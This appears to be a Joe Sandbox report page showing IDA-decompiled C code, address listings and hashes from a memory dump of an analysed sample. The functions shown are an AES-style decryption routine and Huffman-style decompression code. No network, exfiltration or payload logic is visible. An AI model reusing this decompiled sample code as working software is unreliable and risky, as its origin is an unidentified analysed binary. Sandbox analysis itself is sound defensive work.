									if(_t278 == 0) {
										if(_t292 >= 0xfffffff0) {
											_t292 = _t292 - 1;
										}
										goto L46;
									}
									_t279 = _t278 - 1;
									if(_t279 == 0) {
										if(_t292 < 0x10) {
											_t292 = _t292 + 1;
										}
										goto L46;
									}
									_t280 = _t279 - 1;
									if(_t280 == 0) {
										if(_t361 >= 0xfffffff0) {
											_t361 = _t361 - 1;
										}
										goto L46;
									}
									_t281 = _t280 - 1;
									if(_t281 == 0) {
										if(_t361 < 0x10) {
											_t361 = _t361 + 1;
										}
										goto L46;
									}
									_t282 = _t281 - 1;
									if(_t282 == 0) {
										if(_t354 < 0xfffffff0) {
											goto L46;
										}
										_t354 = _t354 - 1;
										L34:
										 *(_t363 + 0x14) = _t354;
										goto L46;
									}
									if(_t282 != 1 || _t354 >= 0x10) {
										goto L46;
									} else {
										_t354 = _t354 + 1;
										goto L34;
									}
								}
								L46:
								_t242 =  *(_t363 + 0x38);
								_t316 =  *(_t363 + 0x28) + _t242;
								 *(_t363 + 0x2c) =  *(_t363 + 0x2c) + 1;
								 *(_t363 + 0x28) = _t316;
							} while (_t316 <  *(_t363 + 0x34));
							_t346 =  *(_t363 + 0x3c);
							L49:
							_t346 = _t346 + 1;
							 *(_t363 + 0x3c) = _t346;
						} while (_t346 < _t242);
						goto L95;
					}
				}
				if(_t238 != 1) {
					goto L95;
				}
				_t319 = __ecx[5];
				_t362 = 0;
				_t337 = __ecx[1];
				 *(_t363 + 0x28) = _t319;
				 *(_t363 + 0x2c) = _t319 + _t319;
				if(_t319 > 0x20000 || _t337 > 0x400 || _t337 == 0) {
					goto L96;
				} else {
					_t286 = _t337;
					 *(_t363 + 0x24) = _t337;
					do {
						_t293 = 0;
						_t348 = _t319;
						if(_t319 <  *(_t363 + 0x2c)) {
							_t320 =  *(_t363 + 0x2c);
							goto L12;
							L12:
							_t287 =  *_t349;
							_t293 = _t293 -  *((intOrPtr*)(_t287 + _t362));
							_t362 = _t362 + 1;
							 *((char*)(_t287 + _t348)) = _t293;
							_t348 = _t348 + _t337;
							if(_t348 < _t320) {
								goto L12;
							} else {
								_t319 =  *(_t363 + 0x28);
								_t286 =  *(_t363 + 0x24);
								goto L14;
							}
						}
						L14:
						_t319 = _t319 + 1;
						_t286 = _t286 - 1;
						 *(_t363 + 0x28) = _t319;
						 *(_t363 + 0x24) = _t286;
					} while (_t286 != 0);
					goto L95;
				}
			}

0x00a3c430
0x00a3c433
0x00a3c436
0x00a3c90a
0x00a3c90a
0x00a3c90d
0x00a3c90f
0x00a3c912
0x00a3c91b
0x00a3c979
0x00000000
0x00a3c979
0x00a3c925
0x00a3c927
0x00a3c929
0x00a3c92f
0x00a3c975
0x00000000
0x00000000
0x00000000
0x00000000
0x00a3c931
0x00a3c931
0x00a3c931
0x00a3c933
0x00a3c934
0x00a3c935
0x00a3c939
0x00a3c93f
0x00a3c943
0x00a3c95e
0x00a3c962
0x00a3c962
0x00a3c945
0x00a3c94a
0x00a3c952
0x00a3c952
0x00a3c94a
0x00a3c964
0x00a3c968
0x00a3c96b
0x00a3c96e
0x00a3c96e
0x00a3c971
0x00000000
0x00a3c931
0x00a3c43c
0x00a3c43f
0x00000000
0x00000000
0x00a3c445
0x00a3c448
0x00a3c847
0x00a3c849
0x00a3c852
0x00000000
0x00000000
0x00a3c85b
0x00a3c85e
0x00a3c864
0x00000000
0x00000000
0x00a3c86e
0x00a3c86f
0x00a3c873
0x00a3c876
0x00a3c87c
0x00000000
0x00000000
0x00a3c87e
0x00a3c886
0x00000000
0x00000000
0x00a3c888
0x00a3c88c
0x00a3c88e
0x00a3c893
0x00a3c897
0x00a3c89b
0x00a3c89c
0x00a3c8a3
0x00a3c8a7
0x00a3c8b6
0x00a3c8d1
0x00a3c8d1
0x00a3c8d6
0x00a3c8da
0x00a3c8da
0x00a3c8de
0x00a3c8df
0x00a3c8e2
0x00a3c8e6
0x00a3c8eb
0x00a3c8ef
0x00a3c8f3
0x00a3c8f3
0x00a3c8f6
0x00a3c8f7
0x00a3c8fa
0x00a3c8fe
0x00a3c8fe
0x00000000
0x00a3c908
0x00a3c44e
0x00a3c451
0x00a3c6ee
0x00a3c6f1
0x00a3c6f4
0x00a3c6f8
0x00a3c703
0x00000000
0x00a3c711
0x00a3c711
0x00a3c714
0x00a3c71b
0x00000000
0x00000000
0x00a3c721
0x00a3c723
0x00a3c729
0x00a3c72a
0x00a3c72d
0x00a3c731
0x00a3c735
0x00a3c737
0x00a3c73b
0x00a3c73f
0x00a3c73f
0x00a3c743
0x00000000
0x00000000
0x00a3c749
0x00a3c74d
0x00a3c754
0x00a3c75b
0x00a3c75d
0x00a3c761
0x00a3c765
0x00a3c76f
0x00a3c776
0x00a3c782
0x00a3c797
0x00a3c79b
0x00a3c7a0
0x00a3c7a4
0x00a3c7a7
0x00a3c7ad
0x00a3c7bd
0x00a3c7c3
0x00a3c7c7
0x00a3c7cb
0x00a3c7cd
0x00a3c7cd
0x00a3c7b3
0x00a3c7b3
0x00a3c7b7
0x00a3c7b7
0x00a3c7ad
0x00a3c7d3
0x00a3c7d5
0x00a3c7d6
0x00a3c7da
0x00a3c7dd
0x00a3c7e6
0x00a3c7ec
0x00a3c7ec
0x00a3c7f6
0x00a3c7fa
0x00a3c7fe
0x00a3c804
0x00a3c805
0x00a3c805
0x00a3c806
0x00a3c80a
0x00a3c812
0x00a3c816
0x00a3c81b
0x00000000
0x00000000
0x00a3c826
0x00a3c82d
0x00a3c830
0x00a3c830
0x00a3c833
0x00a3c836
0x00a3c838
0x00a3c83a
0x00a3c83a
0x00000000
0x00a3c83f
0x00a3c703
0x00a3c457
0x00a3c45a
0x00a3c4d6
0x00a3c4d9
0x00a3c4db
0x00a3c4de
0x00a3c4e4
0x00a3c4e8
0x00a3c4ec
0x00a3c4f6
0x00000000
0x00a3c50f
0x00a3c50f
0x00a3c511
0x00a3c517
0x00000000
0x00000000
0x00000000
0x00000000
0x00a3c51d
0x00a3c51d
0x00a3c51d
0x00a3c526
0x00a3c52b
0x00a3c52d
0x00a3c532
0x00a3c534
0x00a3c539
0x00a3c53f
0x00a3c543
0x00a3c548
0x00a3c54c
0x00a3c54f
0x00a3c557
0x00a3c6d8
0x00000000
0x00000000
0x00000000
0x00000000
0x00a3c55d
0x00a3c55d
0x00a3c55d
0x00a3c56b
0x00a3c56f
0x00a3c573
0x00a3c580
0x00a3c583
0x00a3c5a9
0x00a3c5af
0x00a3c5be
0x00a3c5c2
0x00a3c5c6
0x00a3c5cf
0x00a3c5df
0x00a3c5ef
0x00a3c5ff
0x00a3c60f
0x00a3c61d
0x00a3c62a
0x00a3c62e
0x00a3c636
0x00a3c6b2
0x00a3c638
0x00a3c638
0x00a3c63c
0x00a3c63e
0x00a3c644
0x00a3c645
0x00a3c649
0x00a3c64b
0x00a3c64f
0x00a3c64f
0x00a3c651
0x00a3c656
0x00a3c657
0x00a3c65c
0x00a3c660
0x00a3c663
0x00a3c6ad
0x00a3c6af
0x00a3c6af
0x00000000
0x00a3c6ad
0x00a3c665
0x00a3c668
0x00a3c6a5
0x00a3c6a7
0x00a3c6a7
0x00000000
0x00a3c6a5
0x00a3c66a
0x00a3c66d
0x00a3c69d
0x00a3c69f
0x00a3c69f
0x00000000
0x00a3c69d
0x00a3c66f
0x00a3c672
0x00a3c695
0x00a3c697
0x00a3c697
0x00000000
0x00a3c695
0x00a3c674
0x00a3c677
0x00a3c68d
0x00000000
0x00000000
0x00a3c68f
0x00a3c684
0x00a3c684
0x00000000
0x00a3c684
0x00a3c67c
0x00000000
0x00a3c683
0x00a3c683
0x00000000
0x00a3c683
0x00a3c67c
0x00a3c6b6
0x00a3c6ba
0x00a3c6be
0x00a3c6c0
0x00a3c6c4
0x00a3c6c8
0x00a3c6d2
0x00a3c6dc
0x00a3c6dc
0x00a3c6dd
0x00a3c6e1
0x00000000
0x00a3c6e9
0x00a3c4f6
0x00a3c45f
0x00000000
0x00000000
0x00a3c465
0x00a3c468
0x00a3c46a
0x00a3c46d
0x00a3c474
0x00a3c47e
0x00000000
0x00a3c498
0x00a3c498
0x00a3c49a
0x00a3c49e
0x00a3c49e
0x00a3c4a0
0x00a3c4a6
0x00a3c4a8
0x00a3c4a8
0x00a3c4ac
0x00a3c4ac
0x00a3c4ae
0x00a3c4b1
0x00a3c4b2
0x00a3c4b5
0x00a3c4b9
0x00000000
0x00a3c4bb
0x00a3c4bb
0x00a3c4bf
0x00000000
0x00a3c4bf
0x00a3c4b9
0x00a3c4c3
0x00a3c4c3
0x00a3c4c4
0x00a3c4c7
0x00a3c4cb
0x00a3c4cb
0x00000000
0x00a3c49e

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f24767591d4166fdd23e8e493ff13d911842074e91e8ce94689378ec040f900
Instruction ID: 6a2c0f2f2f836891e929933e6ba005816481c76db8f946c53f3f6f0691cdd99b
Opcode Fuzzy Hash: 9f24767591d4166fdd23e8e493ff13d911842074e91e8ce94689378ec040f900
Instruction Fuzzy Hash: F6F18A71A083118FC758CF29C98462ABBE5FFCA324F155A2EF4C5A7256D730E945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00A3E9B7 Relevance: .3, Instructions: 320
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00A3E9B7(void* __ebx, intOrPtr __ecx, void* __esi) {
				void* _t220;
				intOrPtr _t227;
				void* _t250;
				signed char _t252;
				signed int _t300;
				signed int* _t303;
				signed char _t346;
				unsigned int _t348;
				signed int _t351;
				unsigned int _t354;
				signed int* _t357;
				signed int _t361;
				signed int _t366;
				signed int _t370;
				signed int _t374;
				signed char _t376;
				signed int* _t380;
				signed int _t387;
				signed int _t392;
				intOrPtr _t394;
				signed char _t395;
				signed char _t396;
				signed char _t397;
				unsigned int _t399;
				signed int _t402;
				unsigned int _t405;
				unsigned int _t407;
				unsigned int _t408;
				signed int _t409;
				signed int _t414;
				unsigned int _t415;
				unsigned int _t416;
				signed int _t418;
				signed int _t422;
				signed int _t423;
				intOrPtr _t425;
				signed int _t426;
				void* _t430;
				void* _t431;

				_t407 =  *(_t430 + 0x6c);
				_t425 = __ecx;
				 *((intOrPtr*)(_t430 + 0x24)) = __ecx;
				if(_t407 != 0) {
					_t408 = _t407 >> 4;
					 *(_t430 + 0x6c) = _t408;
					if( *((char*)(__ecx)) == 0) {
						 *((intOrPtr*)(_t430 + 0x38)) = __ecx + 8;
						E00A50320(_t430 + 0x5c, __ecx + 8, 0x10);
						_t431 = _t430 + 0xc;
						if(_t408 == 0) {
							L13:
							return E00A50320( *((intOrPtr*)(_t431 + 0x38)), _t431 + 0x58, 0x10);
						}
						_t392 =  *(_t431 + 0x68);
						 *(_t431 + 0x24) = _t392 + 8;
						_t227 =  *((intOrPtr*)(_t431 + 0x78));
						_t394 = _t392 - _t227 - 8;
						 *((intOrPtr*)(_t431 + 0x34)) = _t394;
						_t357 = _t227 + 8;
						 *(_t431 + 0x28) = _t357;
						do {
							_t414 =  *(_t425 + 4);
							 *(_t431 + 0x30) = _t357 + _t394;
							E00A3E985(_t431 + 0x54, _t357 + _t394, (_t414 << 4) + 0x18 + _t425);
							_t395 =  *(_t431 + 0x4c);
							 *(_t431 + 0x10) =  *(0xa761c8 + (_t395 & 0x000000ff) * 4) ^  *(0xa76dc8 + ( *(_t431 + 0x53) & 0x000000ff) * 4) ^  *(0xa769c8 + ( *(_t431 + 0x56) & 0x000000ff) * 4);
							_t346 =  *(_t431 + 0x58);
							_t361 =  *(_t431 + 0x10) ^  *(0xa765c8 + (_t346 & 0x000000ff) * 4);
							 *(_t431 + 0x10) = _t361;
							 *(_t431 + 0x3c) = _t361;
							_t396 =  *(_t431 + 0x50);
							_t366 =  *(0xa765c8 + (_t395 & 0x000000ff) * 4) ^  *(0xa761c8 + (_t396 & 0x000000ff) * 4) ^  *(0xa76dc8 + ( *(_t431 + 0x57) & 0x000000ff) * 4) ^  *(0xa769c8 + ( *(_t431 + 0x5a) & 0x000000ff) * 4);
							 *(_t431 + 0x1c) = _t366;
							 *(_t431 + 0x40) = _t366;
							_t397 =  *(_t431 + 0x54);
							 *(_t431 + 0x14) =  *(0xa769c8 + ( *(_t431 + 0x4e) & 0x000000ff) * 4) ^  *(0xa765c8 + (_t396 & 0x000000ff) * 4);
							_t370 =  *(_t431 + 0x14) ^  *(0xa761c8 + (_t397 & 0x000000ff) * 4) ^  *(0xa76dc8 + ( *(_t431 + 0x5b) & 0x000000ff) * 4);
							 *(_t431 + 0x14) = _t370;
							 *(_t431 + 0x44) = _t370;
							 *(_t431 + 0x18) =  *(0xa76dc8 + ( *(_t431 + 0x4f) & 0x000000ff) * 4) ^  *(0xa769c8 + ( *(_t431 + 0x52) & 0x000000ff) * 4);
							_t374 =  *(_t431 + 0x18) ^  *(0xa765c8 + (_t397 & 0x000000ff) * 4) ^  *(0xa761c8 + (_t346 & 0x000000ff) * 4);
							_t250 = _t414 - 1;
							 *(_t431 + 0x18) = _t374;
							 *(_t431 + 0x48) = _t374;
							if(_t250 <= 1) {
								goto L9;
							}
							_t409 =  *(_t431 + 0x1c);
							_t422 = (_t250 + 2 << 4) + _t425;
							_t426 =  *(_t431 + 0x10);
							 *(_t431 + 0x18) = _t422;
							 *(_t431 + 0x20) = _t250 - 1;
							do {
								_t405 =  *_t422 ^  *(_t431 + 0x14);
								 *(_t431 + 0x10) =  *(_t422 - 8) ^ _t426;
								 *(_t431 + 0x1c) =  *(_t422 + 4) ^ _t374;
								_t354 =  *(_t422 - 4) ^ _t409;
								_t423 =  *(_t431 + 0x1c);
								_t426 =  *(0xa769c8 + (_t405 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa765c8 + (_t423 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa76dc8 + (_t354 >> 0x18) * 4) ^  *(0xa761c8 + ( *(_t431 + 0x10) & 0x000000ff) * 4);
								 *(_t431 + 0x3c) = _t426;
								_t409 =  *(0xa769c8 + (_t423 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa765c8 + ( *(_t431 + 0x10) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa76dc8 + (_t405 >> 0x18) * 4) ^  *(0xa761c8 + (_t354 & 0x000000ff) * 4);
								 *(_t431 + 0x40) = _t409;
								_t387 =  *(0xa765c8 + (_t354 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa769c8 + ( *(_t431 + 0x10) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa76dc8 + (_t423 >> 0x18) * 4) ^  *(0xa761c8 + (_t405 & 0x000000ff) * 4);
								 *(_t431 + 0x14) = _t387;
								 *(_t431 + 0x44) = _t387;
								_t422 =  *(_t431 + 0x18) - 0x10;
								 *(_t431 + 0x18) = _t422;
								_t374 =  *(0xa769c8 + (_t354 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa765c8 + (_t405 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa76dc8 + ( *(_t431 + 0x10) >> 0x18) * 4) ^  *(0xa761c8 + (_t423 & 0x000000ff) * 4);
								_t132 = _t431 + 0x20;
								 *_t132 =  *(_t431 + 0x20) - 1;
								 *(_t431 + 0x48) = _t374;
							} while ( *_t132 != 0);
							 *(_t431 + 0x1c) = _t409;
							_t408 =  *(_t431 + 0x74);
							 *(_t431 + 0x10) = _t426;
							_t425 =  *((intOrPtr*)(_t431 + 0x2c));
							 *(_t431 + 0x18) = _t374;
							L9:
							_t252 =  *(_t425 + 0x28) ^  *(_t431 + 0x10);
							 *(_t431 + 0x20) = _t252;
							 *(_t431 + 0x4c) = _t252;
							_t376 =  *(_t425 + 0x34) ^  *(_t431 + 0x18);
							 *(_t431 + 0x3c) =  *((intOrPtr*)((_t252 & 0x000000ff) + 0xa750c8));
							_t399 =  *(_t425 + 0x30) ^  *(_t431 + 0x14);
							_t348 =  *(_t425 + 0x2c) ^  *(_t431 + 0x1c);
							 *((char*)(_t431 + 0x3d)) =  *((intOrPtr*)((_t376 >> 0x00000008 & 0x000000ff) + 0xa750c8));
							_t415 =  *(_t431 + 0x20);
							 *(_t431 + 0x54) = _t399;
							 *(_t431 + 0x50) = _t348;
							 *((char*)(_t431 + 0x3e)) =  *((intOrPtr*)((_t399 >> 0x00000010 & 0x000000ff) + 0xa750c8));
							 *(_t431 + 0x58) = _t376;
							 *((char*)(_t431 + 0x3f)) =  *((intOrPtr*)((_t348 >> 0x18) + 0xa750c8));
							 *(_t431 + 0x40) =  *((intOrPtr*)((_t348 & 0x000000ff) + 0xa750c8));
							 *((char*)(_t431 + 0x41)) =  *((intOrPtr*)((_t415 >> 0x00000008 & 0x000000ff) + 0xa750c8));
							 *((char*)(_t431 + 0x42)) =  *((intOrPtr*)((_t376 >> 0x00000010 & 0x000000ff) + 0xa750c8));
							 *((char*)(_t431 + 0x43)) =  *((intOrPtr*)((_t399 >> 0x18) + 0xa750c8));
							 *(_t431 + 0x44) =  *((intOrPtr*)((_t399 & 0x000000ff) + 0xa750c8));
							 *((char*)(_t431 + 0x45)) =  *((intOrPtr*)((_t348 >> 0x00000008 & 0x000000ff) + 0xa750c8));
							_t416 = _t415 >> 0x18;
							 *((char*)(_t431 + 0x46)) =  *((intOrPtr*)((_t415 >> 0x00000010 & 0x000000ff) + 0xa750c8));
							 *((char*)(_t431 + 0x47)) =  *((intOrPtr*)((_t376 >> 0x18) + 0xa750c8));
							 *(_t431 + 0x48) =  *((intOrPtr*)((_t376 & 0x000000ff) + 0xa750c8));
							_t402 =  *(_t425 + 0x18) ^  *(_t431 + 0x3c);
							 *((char*)(_t431 + 0x49)) =  *((intOrPtr*)((_t399 >> 0x00000008 & 0x000000ff) + 0xa750c8));
							 *((char*)(_t431 + 0x4a)) =  *((intOrPtr*)((_t348 >> 0x00000010 & 0x000000ff) + 0xa750c8));
							_t186 = _t416 + 0xa750c8; // 0x30d56a09
							 *((char*)(_t431 + 0x4b)) =  *_t186;
							_t300 =  *(_t425 + 0x24) ^  *(_t431 + 0x48);
							_t418 =  *(_t425 + 0x1c) ^  *(_t431 + 0x40);
							_t351 =  *(_t425 + 0x20) ^  *(_t431 + 0x44);
							 *(_t431 + 0x20) = _t300;
							if( *((char*)(_t425 + 1)) != 0) {
								_t402 = _t402 ^  *(_t431 + 0x5c);
								_t418 = _t418 ^  *(_t431 + 0x60);
								_t351 = _t351 ^  *(_t431 + 0x64);
								 *(_t431 + 0x20) = _t300 ^  *(_t431 + 0x68);
							}
							 *(_t431 + 0x5c) =  *( *(_t431 + 0x30));
							_t303 =  *(_t431 + 0x24);
							 *(_t431 + 0x60) =  *(_t303 - 4);
							 *(_t431 + 0x64) =  *_t303;
							 *(_t431 + 0x68) = _t303[1];
							_t380 =  *(_t431 + 0x28);
							 *(_t431 + 0x24) =  &(_t303[4]);
							 *(_t380 - 8) = _t402;
							_t380[1] =  *(_t431 + 0x20);
							_t394 =  *((intOrPtr*)(_t431 + 0x34));
							 *(_t380 - 4) = _t418;
							 *_t380 = _t351;
							_t357 =  &(_t380[4]);
							_t408 = _t408 - 1;
							 *(_t431 + 0x28) = _t357;
							 *(_t431 + 0x74) = _t408;
						} while (_t408 != 0);
						goto L13;
					}
					return E00A3EE7A( *((intOrPtr*)(_t430 + 0x70)), _t408,  *((intOrPtr*)(_t430 + 0x70)));
				}
				return _t220;
			}

0x00a3e9bc
0x00a3e9c0
0x00a3e9c2
0x00a3e9c8
0x00a3e9ce
0x00a3e9d5
0x00a3e9d9
0x00a3e9f4
0x00a3e9fd
0x00a3ea02
0x00a3ea07
0x00a3ee5f
0x00000000
0x00a3ee6f
0x00a3ea0d
0x00a3ea16
0x00a3ea1a
0x00a3ea20
0x00a3ea23
0x00a3ea27
0x00a3ea2a
0x00a3ea2e
0x00a3ea2e
0x00a3ea35
0x00a3ea48
0x00a3ea4d
0x00a3ea73
0x00a3ea77
0x00a3ea82
0x00a3ea89
0x00a3ea8d
0x00a3ea94
0x00a3eaba
0x00a3eac6
0x00a3eaca
0x00a3ead8
0x00a3eae3
0x00a3eafa
0x00a3eb06
0x00a3eb0a
0x00a3eb21
0x00a3eb36
0x00a3eb3d
0x00a3eb40
0x00a3eb44
0x00a3eb4b
0x00000000
0x00000000
0x00a3eb51
0x00a3eb5b
0x00a3eb5d
0x00a3eb62
0x00a3eb66
0x00a3eb6a
0x00a3eb71
0x00a3eb75
0x00a3eb81
0x00a3eb85
0x00a3eb87
0x00a3ebbc
0x00a3ebdc
0x00a3ebf6
0x00a3ec19
0x00a3ec36
0x00a3ec3d
0x00a3ec41
0x00a3ec70
0x00a3ec73
0x00a3ec77
0x00a3ec7e
0x00a3ec7e
0x00a3ec83
0x00a3ec83
0x00a3ec8d
0x00a3ec91
0x00a3ec95
0x00a3ec99
0x00a3ec9d
0x00a3eca1
0x00a3eca4
0x00a3eca8
0x00a3ecac
0x00a3ecb6
0x00a3ecc3
0x00a3eccf
0x00a3ecd6
0x00a3ece0
0x00a3ecec
0x00a3ecf0
0x00a3ecf4
0x00a3ecfe
0x00a3ed07
0x00a3ed11
0x00a3ed1e
0x00a3ed30
0x00a3ed42
0x00a3ed51
0x00a3ed61
0x00a3ed76
0x00a3ed82
0x00a3ed8b
0x00a3ed9a
0x00a3eda7
0x00a3edb1
0x00a3edbb
0x00a3edc8
0x00a3edcc
0x00a3edd2
0x00a3eddf
0x00a3ede3
0x00a3ede7
0x00a3edef
0x00a3edf3
0x00a3edf5
0x00a3edf9
0x00a3edfd
0x00a3ee05
0x00a3ee05
0x00a3ee0f
0x00a3ee13
0x00a3ee1a
0x00a3ee20
0x00a3ee2a
0x00a3ee2e
0x00a3ee32
0x00a3ee36
0x00a3ee3d
0x00a3ee40
0x00a3ee44
0x00a3ee47
0x00a3ee49
0x00a3ee4c
0x00a3ee4f
0x00a3ee53
0x00a3ee53
0x00000000
0x00a3ee5e
0x00000000
0x00a3e9e4
0x00a3ee77

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f87ace181a823fdd5c3cfc5f301d9053b11e6847e004fca594afd74d1ef662b4
Instruction ID: 5b55b7ae570db125106ef951045bfa358a4e31761f9ac2eb2a823cd38f2b8b89
Opcode Fuzzy Hash: f87ace181a823fdd5c3cfc5f301d9053b11e6847e004fca594afd74d1ef662b4
Instruction Fuzzy Hash: 85E16D765087908FC304CF69D88096ABFF0BF9A300F45495EF9D897352C235EA5ADB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A44088 Relevance: .3, Instructions: 270
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00A44088(void* __ecx, void* __edx) {
				void* __edi;
				signed int _t82;
				signed int _t87;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				void* _t99;
				void* _t101;
				void* _t121;
				signed int _t130;
				signed int _t139;
				signed int _t140;
				signed int _t149;
				signed int _t151;
				void* _t153;
				signed int _t156;
				signed int _t157;
				intOrPtr* _t158;
				intOrPtr* _t167;
				signed int _t170;
				void* _t171;
				signed int _t174;
				void* _t179;
				unsigned int _t181;
				void* _t184;
				signed int _t185;
				intOrPtr* _t186;
				void* _t187;
				signed int _t188;
				signed int _t189;
				intOrPtr* _t190;
				signed int _t193;
				signed int _t198;
				void* _t201;

				_t179 = __edx;
				_t187 = __ecx;
				_t186 = __ecx + 4;
				if( *_t186 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19 || E00A44DC4(__ecx) != 0) {
					E00A3A881(_t186,  ~( *(_t187 + 8)) & 0x00000007);
					_t82 = E00A3A898(_t186);
					_t205 = _t82 & 0x00008000;
					if((_t82 & 0x00008000) == 0) {
						_t139 = 0;
						 *((intOrPtr*)(_t187 + 0xe65c)) = 0;
						 *((intOrPtr*)(_t187 + 0x98d0)) = 0;
						 *((intOrPtr*)(_t187 + 0x98d4)) = 0;
						__eflags = _t82 & 0x00004000;
						if((_t82 & 0x00004000) == 0) {
							E00A4FFF0(_t186, _t187 + 0xe4c8, 0, 0x194);
							_t201 = _t201 + 0xc;
						}
						E00A3A881(_t186, 2);
						do {
							 *(_t201 + 0x14) = E00A3A898(_t186) >> 0xc;
							E00A3A881(_t186, 4);
							_t87 =  *(_t201 + 0x10);
							__eflags = _t87 - 0xf;
							if(_t87 != 0xf) {
								 *(_t201 + _t139 + 0x14) = _t87;
								goto L15;
							}
							_t188 = E00A3A898(_t186) >> 0x0000000c & 0x000000ff;
							E00A3A881(_t186, 4);
							__eflags = _t188;
							if(_t188 != 0) {
								_t189 = _t188 + 2;
								__eflags = _t189;
								while(1) {
									_t189 = _t189 - 1;
									__eflags = _t139 - 0x14;
									if(_t139 >= 0x14) {
										break;
									}
									 *(_t201 + _t139 + 0x14) = 0;
									_t139 = _t139 + 1;
									__eflags = _t189;
									if(_t189 != 0) {
										continue;
									}
									break;
								}
								_t139 = _t139 - 1;
								goto L15;
							}
							 *(_t201 + _t139 + 0x14) = 0xf;
							L15:
							_t139 = _t139 + 1;
							__eflags = _t139 - 0x14;
						} while (_t139 < 0x14);
						_push(0x14);
						_t190 = _t187 + 0x3c50;
						_push(_t190);
						_push(_t201 + 0x1c);
						E00A43797();
						_t140 = 0;
						__eflags = 0;
						do {
							__eflags =  *_t186 -  *((intOrPtr*)(_t187 + 0x84)) - 5;
							if( *_t186 <=  *((intOrPtr*)(_t187 + 0x84)) - 5) {
								L19:
								_t92 = E00A3A89D(_t186);
								_t93 =  *(_t190 + 0x84);
								_t181 = _t92 & 0x0000fffe;
								__eflags = _t181 -  *((intOrPtr*)(_t190 + 4 + _t93 * 4));
								if(_t181 >=  *((intOrPtr*)(_t190 + 4 + _t93 * 4))) {
									_t149 = 0xf;
									_t94 = _t93 + 1;
									 *(_t201 + 0x10) = _t149;
									__eflags = _t94 - _t149;
									if(_t94 >= _t149) {
										L27:
										_t151 =  *(_t186 + 4) +  *(_t201 + 0x10);
										 *_t186 =  *_t186 + (_t151 >> 3);
										_t97 =  *(_t201 + 0x10);
										 *(_t186 + 4) = _t151 & 0x00000007;
										_t153 = 0x10;
										_t156 =  *((intOrPtr*)(_t190 + 0x44 + _t97 * 4)) + (_t181 -  *((intOrPtr*)(_t190 + _t97 * 4)) >> _t153 - _t97);
										__eflags = _t156 -  *_t190;
										asm("sbb eax, eax");
										_t98 = _t97 & _t156;
										__eflags = _t98;
										_t157 =  *(_t190 + 0xc88 + _t98 * 2) & 0x0000ffff;
										L28:
										_t184 = 0x10;
										__eflags = _t157 - _t184;
										if(_t157 >= _t184) {
											_t99 = 0x12;
											__eflags = _t157 - _t99;
											if(__eflags >= 0) {
												_t158 = _t186;
												if(__eflags != 0) {
													_t193 = (E00A3A898(_t158) >> 9) + 0xb;
													__eflags = _t193;
													_push(7);
												} else {
													_t193 = (E00A3A898(_t158) >> 0xd) + 3;
													_push(3);
												}
												_pop(_t101);
												E00A3A881(_t186, _t101);
												while(1) {
													_t193 = _t193 - 1;
													__eflags = _t140 - 0x194;
													if(_t140 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t140 + 0x28) = 0;
													_t140 = _t140 + 1;
													__eflags = _t193;
													if(_t193 != 0) {
														continue;
													}
													L44:
													_t190 = _t187 + 0x3c50;
													goto L45;
												}
												break;
											}
											__eflags = _t157 - _t184;
											_t167 = _t186;
											if(_t157 != _t184) {
												_t198 = (E00A3A898(_t167) >> 9) + 0xb;
												__eflags = _t198;
												_push(7);
											} else {
												_t198 = (E00A3A898(_t167) >> 0xd) + 3;
												_push(3);
											}
											_pop(_t121);
											E00A3A881(_t186, _t121);
											__eflags = _t140;
											if(_t140 == 0) {
												goto L47;
											} else {
												while(1) {
													_t198 = _t198 - 1;
													__eflags = _t140 - 0x194;
													if(_t140 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t140 + 0x28) =  *((intOrPtr*)(_t201 + _t140 + 0x27));
													_t140 = _t140 + 1;
													__eflags = _t198;
													if(_t198 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t201 + _t140 + 0x28) =  *((intOrPtr*)(_t140 + _t187 + 0xe4c8)) + _t157 & 0x0000000f;
										_t140 = _t140 + 1;
										goto L45;
									}
